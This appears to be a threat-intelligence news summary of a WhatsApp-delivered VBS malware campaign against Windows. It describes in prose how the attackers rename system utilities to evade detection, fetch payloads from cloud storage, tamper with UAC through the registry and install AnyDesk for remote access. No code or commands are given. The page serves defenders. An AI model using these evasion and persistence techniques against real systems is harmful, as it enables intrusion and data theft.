WhatsApp-delivered VBS malware abuses UAC bypass for persistent Windows compromise via cloud-hosted MSI payloads

First reported

01.04.2026 14:49

Last updated

1 unique sources, 1 articles

Summary

Hide ▲

A malware campaign observed since late February 2026 delivers malicious Visual Basic Script (VBS) files to Windows users via WhatsApp, executing multi-stage attacks to establish persistence and enable remote access. The attack chain uses renamed legitimate Windows utilities (e.g., curl.exe → netapi.dll, bitsadmin.exe → sc.exe) to evade detection, retrieves payloads from trusted cloud services (AWS S3, Tencent Cloud, Backblaze B2), and installs unsigned MSI packages. The malware weakens User Account Control (UAC) defenses by repeatedly attempting elevated cmd.exe execution, modifying registry keys under HKLM\Software\Microsoft\Win, and embedding persistence to survive reboots. This enables privilege escalation without user interaction and deployment of remote access tools like AnyDesk, facilitating data theft and secondary malware delivery.

Timeline

01.04.2026 14:49 1 articles · 3h ago

WhatsApp-delivered VBS malware establishes persistent Windows compromise via UAC bypass and cloud-hosted MSI payloads
Since late February 2026, a campaign has delivered malicious VBS files via WhatsApp to Windows users. Execution creates hidden directories in C:\ProgramData and drops renamed Windows utilities (e.g., netapi.dll for curl.exe) to blend into normal activity. Payloads are retrieved from AWS S3, Tencent Cloud, and Backblaze B2 using these renamed binaries, followed by installation of unsigned MSI packages. The malware weakens UAC defenses by repeatedly attempting elevated cmd.exe execution, modifying registry keys (HKLM\Software\Microsoft\Win), and embedding persistence to survive reboots. This enables privilege escalation without user interaction and deployment of remote access tools like AnyDesk.
Show sources

Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
Open in new tab

Information Snippets

Campaign active since late February 2026, delivering malicious VBS files via WhatsApp messages.
First reported: 01.04.2026 14:49

1 source, 1 article
Show sources
- Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
Initial payload drops hidden folders in C:\ProgramData and renamed Windows utilities (e.g., curl.exe → netapi.dll, bitsadmin.exe → sc.exe) to blend into normal activity.
First reported: 01.04.2026 14:49

1 source, 1 article
Show sources
- Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
Secondary payloads retrieved from AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries.
First reported: 01.04.2026 14:49

1 source, 1 article
Show sources
- Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
Malware tampers with UAC settings by continuously attempting elevated cmd.exe execution and modifying registry entries under HKLM\Software\Microsoft\Win to achieve persistence.
First reported: 01.04.2026 14:49

1 source, 1 article
Show sources
- Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
Unsigned MSI installers are deployed, including legitimate tools like AnyDesk, providing persistent remote access for exfiltration or additional malware deployment.
First reported: 01.04.2026 14:49

1 source, 1 article
Show sources
- Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49

Summary

Timeline

WhatsApp-delivered VBS malware establishes persistent Windows compromise via UAC bypass and cloud-hosted MSI payloads

Information Snippets